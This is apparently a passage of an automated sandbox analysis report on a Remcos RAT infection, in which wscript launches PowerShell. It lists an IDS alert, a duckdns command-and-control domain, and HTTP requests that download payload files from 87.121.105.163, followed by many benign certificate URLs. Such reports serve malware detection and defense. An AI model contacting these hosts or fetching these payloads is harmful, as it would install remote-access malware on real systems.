              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2310028531.0000000007302000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb"` source: powershell.exe, 00000007.00000002.2310028531.0000000007210000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.2310028531.000000000722E000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49739 -> 94.156.79.69:3770
              Source: Malware configuration extractorURLs: darvien99lakoustr01.duckdns.org
              Source: unknownDNS query: name: darvien99lakoustr01.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49739 -> 94.156.79.69:3770
              Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: global trafficHTTP traffic detected: GET /Flyvnings.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /YSnpkrCwWalJFSpN146.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: global trafficHTTP traffic detected: GET /Flyvnings.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /YSnpkrCwWalJFSpN146.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: darvien99lakoustr01.duckdns.org
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C0583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2344127035.000001E3C1AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C0583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Flyvnings.u32P
              Source: powershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Flyvnings.u32XR
              Source: wab.exe, 00000009.00000002.2953979686.0000000005131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/YSnpkrCwWalJFSpN146.bin
              Source: wab.exe, 00000009.00000002.2966034231.00000000208D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/YSnpkrCwWalJFSpN146.bindumpsSexaideca.org.pe/1/YSnpkrCwWalJFSpN146.bin
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C1F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
              Source: wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698889559.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1699138045.0000027B9DDA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681772020.0000027B9BFAF000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
              Source: wscript.exe, 00000000.00000003.1682137616.0000027B9DE2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?153db15a98
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
              Source: powershell.exe, 00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
              Source: powershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C0361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2304380055.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671268631.0000027B9DEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671268631.0000027B9DEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671268631.0000027B9DEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
              Source: wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
              Source: powershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
              Source: wscript.exe, 00000000.00000003.1672561159.0000027B9DE3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
              Source: wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
              Source: wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672767605.0000027B9DE38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
              Source: wscript.exe, 00000000.00000003.1673084183.0000027B9DE2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
              Source: wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
